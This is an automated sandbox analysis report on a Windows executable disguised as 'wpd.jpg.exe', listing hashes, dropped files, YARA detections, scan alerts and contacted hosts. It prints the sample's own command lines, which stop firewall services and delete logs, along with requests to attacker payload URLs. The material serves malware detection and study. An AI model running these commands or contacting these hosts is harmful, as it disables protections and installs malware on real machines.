Category | Machine | Started | Completed |
---|---|---|---|
ARCHIVE | s1_win7_x6402 | June 7, 2024, 5:48 p.m. | June 7, 2024, 5:50 p.m. |
Archive wpd.jpg.exe @ sandbox.zip
Summary
Size | 8.4MB |
---|---|
Type | PE32 executable (console) Intel 80386, for MS Windows |
MD5 | 1bfe19a314dd31d6adda302f177c3b7c |
SHA1 | 37fd59aa2c2b77c8757438075138f11eaedf81b8 |
SHA256 | b63ce450e4d34d1cdd727a1a246d38167f45aeacc69d15c6922ef723e49a3cf7 |
SHA512 |
b486b312f809146fbe95f121ea9d7bfc152266e5ca1a178316aafe4ca21e4a80ffa76b5c7e36758d45714439b34f7f6fa6d3ed2a599f64fd7dfe5a23d416a638
|
CRC32 | CD831527 |
ssdeep | 196608:1M6/uTeIz//QEJZe+t6SuqYTFLQmEe2r06+mVWFO5p5adyuFqAHBLgMP:l/YeIzAYe+t1uTJQddQ3Qub |
Yara |
|
-
-
cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto
2228-
taskkill.exe taskkill /f /im csrs.exe
196 -
sc.exe sc start netprofm
1688 -
sc.exe sc config netprofm start= auto
1196 -
sc.exe sc start NlaSvc
1728 -
sc.exe sc config NlaSvc start= auto
2516
-
-
cmd.exe C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
1060 -
-
taskkill.exe taskkill /im csrs.exe /f
3652
-
-
-
csrs.exe csrs.exe -m 6 -t 200 -l 9999
3820
-
-
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49755 -> 192.168.57.21:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.102:50113 -> 192.168.57.196:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.102:50045 -> 192.168.57.127:445 | 2001569 | ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection | Misc activity |
Suricata TLS
No Suricata TLS
section | xx0 |
section | xx1 |
section | xx2 |
resource name | BIN |
resource name | TXT |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/xpxmr.txt | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/ok/wpd.html | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://104.37.187.182/wpdmd5.txt | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://104.37.187.182/wpdtest.txt | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/ver.txt | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/shellver.txt |
request | GET http://104.37.187.182/xpxmr.txt |
request | GET http://104.37.187.182/ok/wpd.html |
request | GET http://104.37.187.182/wpdmd5.txt |
request | GET http://104.37.187.182/wpdtest.txt |
request | GET http://104.37.187.182/ver.txt |
request | GET http://104.37.187.182/shellver.txt |
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | TXT | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00eaeab8 | size | 0x0008d49b | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00f3bf54 | size | 0x00000038 | ||||||||||||||||||
name | RT_VERSION | language | LANG_CHINESE | filetype | COM executable for DOS | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e0c350 | size | 0x000002b8 |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcm90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\python27.dll |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Util._counter.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._DES3.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\_hashlib.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\cryptography.hazmat.bindings._constant_time.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\_socket.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\select.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Hash._MD4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\python27.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcm90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\_ssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._DES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\_cffi_backend.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Random.OSRNG.winrandom.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\pyexpat.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Util.strxor.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\cryptography.hazmat.bindings._openssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._AES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Hash._SHA256.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._ARC4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\bz2.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\_ctypes.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\unicodedata.pyd |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csrs.exe") |
section | {u'size_of_data': u'0x0085f400', u'virtual_address': u'0x005ac000', u'entropy': 7.92303226230594, u'name': u'xx2', u'virtual_size': u'0x0085f2c0'} | entropy | 7.92303226231 | description | A section with a high entropy has been found | |||||||||
entropy | 0.99953363647 | description | Overall entropy of this PE file is high |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/941.png |
url | https://ssl.pstatic.net/static/pwe/common/img_use_mobile_version.png |
url | https://s.pstatic.net/shopping.phinf/20211101_9/6565979b-3e08-4e3d-8514-b2a585c9e46e.jpg |
url | http://uk.ask.com/favicon.ico |
url | http://www.priceminister.com/ |
url | https://s.pstatic.net/static/www/mobile/edit/20210930/mobile_161522481722.png |
url | http://175.208.134.150:8282/test/test.eml |
url | https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F20211013_1095%2Fupload_1634111386163GV3Vc.JPEG%22 |
url | http://es.wikipedia.org/ |
url | https://www.semicolonworld.com/public/js/cookiealert.js |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/477.png |
url | http://blogimgs.naver.net/nblog/mylog/post/btn_cancel.gif |
url | https://www.semicolonworld.com/public/editor/styles/simditor.css |
url | http://busqueda.aol.com.mx/ |
url | http://blogimgs.naver.net/nblog/guestbook/btn_close2.gif |
url | https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct |
url | http://recherche.linternaute.com/ |
url | https://s.pstatic.net/static/newsstand/up/2017/1122/nsd113655834.png |
url | http://www.yceml.net/0559/10408495-1499411010011 |
url | https://ssl.pstatic.net/tveta/libs/1364/1364526/a5068a6f44555ea499da_20211029164146193.jpg |
url | https://tistory3.daumcdn.net/tistory/807805/skin/images/logo_tistory.gif |
url | http://busca.orange.es/ |
url | http://ja.wikipedia.org/favicon.ico |
url | https://siape.veta.naver.com/fxshow?su=SU10599 |
url | https://s.pstatic.net/shopping.phinf/20211013_2/ee5c113b-bfae-4cf3-81e3-2ba12403fc6d.jpg |
url | https://ssl.pstatic.net/static/pwe/nm/b.gif |
url | http://search.nifty.com/ |
url | https://castbox.shopping.naver.com/js/lazyload.js |
url | https://ssl.pstatic.net/tveta/libs/1339/1339221/f1a87c541e410a8250af_20211006100906815.jpg |
url | http://ns.adobe.com/exif/1.0/ |
url | https://s.pstatic.net/shopping.phinf/20200729_1/2931dd60-1842-4048-a39c-1e3389db4a0e.jpg |
url | https://ssl.pstatic.net/static/pwe/nm/spr_vertical_0d25bb77f8.png |
url | http://www.google.com.sa/ |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/361.png |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/042.png |
url | https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F20211012_1095%2Fupload_1634015607233BeFLd.JPEG%22 |
url | http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/056.png |
url | http://www.buzzadnetwork.com/jump/next.php?stamat=m%7CM-4iM-4jaQdHQBH0dEdHP3xP.0e7%2CboDB7XrVJDfRqYwVNhmAc8QRCrIuseXl_bWuTf_latOFYiGEzPpb7ikp5t8RPmTHyMRYDe1i9EJZLC6LSuccW1-YPggnMxkcwVirdNVGfgK3hFUbeKvFvqNv0-u8VxfrNUFB1gFhMN_8GLCn1znxf5_p0FJe0MYRI7nbfyajoqg_H3fvzrjsMsC0vAMYn2un8v5vcBfzwM-DewoZ7WId7geGlrySfAHx5KiJ5Hm90CU%2C |
url | http://fr.wikipedia.org/favicon.ico |
url | https://t1.daumcdn.net/tistory_admin/blogs/plugins/PreventCopyContents/js/functions.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336 |
url | https://www.semicolonworld.com/public/editor/scripts/page-demo.js |
url | http://www.amazon.com/favicon.ico |
url | https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F20211029_1095%2Fupload_1635469564183PpB2J.jpg%22 |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/038.png |
url | http://search.chol.com/favicon.ico |
url | https://ssl.pstatic.net/static/pwe/address/deskhome/spr_cp_loading.png |
url | http://purl.org/rss/1.0/ |
url | http://www.google.es/ |
url | https://www.google.com/pagead/drt/ui |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
cmdline | sc start NlaSvc |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | sc config NlaSvc start= auto |
cmdline | sc start netprofm |
cmdline | sc stop 1MpsSvc |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | taskkill /im csrs.exe /f |
cmdline | taskkill /f /im csrs.exe |
cmdline | sc config 1MpsSvc start= disabled |
cmdline | sc config netprofm start= auto |
cmdline | sc config WinNsaSrv start= disabled |
cmdline | net stop WinNsaSrv |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
host | 104.37.187.182 | |||
host | 139.5.177.32 |
description | wpd.jpg.exe tried to sleep 197 seconds, actually delayed analysis time by 197 seconds | |||
description | csrs.exe tried to sleep 1741 seconds, actually delayed analysis time by 1741 seconds |
url | http://175.208.134.150:8282/test/test.eml |
url | http://104.37.187.182/ok/wpd.html |
url | http://175.208.134.150:8282/favicon.ico |
url | http://123.123.123.123 |
url | http://192.168.3.119/ |
url | http://104.37.187.182/wpdmd5.txt |
url | http://123.123.123.123:54321/dlr.arm |
url | https://192.168.3.119/ |
url | http://139.5.177.32:9999/ |
url | http://185.47.128.124:8124/m17010.txt |
url | http://139.5.177.32:9999 |
dead_host | 139.5.177.32:9999 |
dead_host | 192.168.56.102:49279 |
dead_host | 192.168.56.103:445 |
dead_host | 192.168.56.1:1433 |
dead_host | 192.168.56.1:445 |
dead_host | 192.168.56.102:49229 |
dead_host | 192.168.56.103:1433 |